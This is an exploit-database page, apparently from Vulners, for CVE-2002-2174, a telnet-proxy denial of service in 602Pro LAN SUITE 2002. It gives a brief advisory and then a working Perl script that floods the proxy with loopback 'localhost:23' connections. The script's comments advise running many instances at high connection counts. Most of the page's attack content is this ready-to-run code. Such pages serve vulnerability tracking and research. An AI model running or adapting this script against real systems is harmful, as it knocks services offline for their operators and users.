602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2002-2174 | 16 Nov 200521:17 | – | cve | |
| CVE-2002-2174 | 16 Nov 200521:17 | – | cvelist | |
| EUVD-2002-2153 | 7 Oct 202500:30 | – | euvd | |
| CVE-2002-2174 | 31 Dec 200205:00 | – | nvd | |
| CVE-2002-2174 | 21 May 202520:34 | – | redhatcve |
source: https://www.securityfocus.com/bid/5416/info
The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhost. If a large number of these connections are made concurrently, it is possible to cause a denial of service via resource exhaustion.
#!/usr/bin/perl
#
# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS
#
# Note: Try very high number of connections and run multiple instances
# of the script for quick results.
#
# Date: August 3, 2002
# Author: Stan Bubrouski ([email protected])
if (!$ARGV[2]) {
print "Usage $0 <hostname> <port> <connections>\n\n";
exit();
}
$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];
use Net::Telnet ();
$t = new Net::Telnet;
$t->open(Host => $host,Port => $port);
foreach(1...$numc) {
$t->waitfor('/.*host.*/');
$t->print('localhost:23');
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02451